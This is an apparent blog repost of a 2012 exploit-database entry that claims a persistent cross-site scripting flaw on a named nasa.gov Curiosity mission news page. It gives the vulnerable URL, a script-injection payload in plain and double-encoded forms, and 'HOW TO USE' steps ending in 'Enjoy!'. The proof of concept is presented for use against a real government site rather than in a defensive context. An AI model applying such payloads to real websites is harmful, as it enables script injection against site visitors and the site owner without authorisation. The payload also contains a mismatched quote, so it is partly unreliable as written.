jueves, 23 de agosto de 2012

Cross Site Scripting NASA.GOV



1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0      _                   __           __       __                      1
1    /' \            __  /'__`\        /\ \__  /'__`\                    0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
1                   \ \____/ >> Exploit database separated by exploit    0
0                    \/___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0   [x] Official Website: http://www.1337day.com                         0
1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
0                                                                        0
1                              1
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
|                                                                        |
|              NASA.GOV - Cross Site Scripting Persistent            |
--------------------------------------------------------------------------
# Exploit Title : NASA Curiosity - Cross Site Scripting Persistent
# Date : 21-08-2012
# Author        : Caleb Bucker (Independent Security Researcher)
# Vendor : NASA
# Category : misc
# URL Vendor    : http://www.nasa.gov/
# Tested on   : BackTrack 5 r3 - Mozilla Firefox
# Contact      : calebbucker@gmail.com
# Website       : www.calebbucker.blogspot.com
# Greetings to  : CL-Security All Members And Friend's

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SCREENSHOT:

http://img341.imageshack.us/img341/4395/snapshot408.png

http://img837.imageshack.us/img837/7151/snapshot409.png
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

VULNERABILITY LOCATION:

www.nasa.gov/mission_pages/msl/news/msl20120817.html[code]
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

CROSS SITE SCRIPTING:

www.nasa.gov/mission_pages/msl/news/msl20120817.html"><script>alert
('CalebBucker')</script> %2522%253E%253Cscript%253Ealert%2528%2527
CalebBucker%2527%2529%253C%252fscript%253E

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

HOW TO USE:

"><script>alert('XSS")</script> send it through, works on GET nothing else
is really special about it.

so double encoded it will look like this:

%2522%253E%253Cscript%253Ealert%2528%2527XSS%2527%2529%253C%252fscript%253E
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Enjoy!

# 1337day.com [2012-08-22]

1 comentario: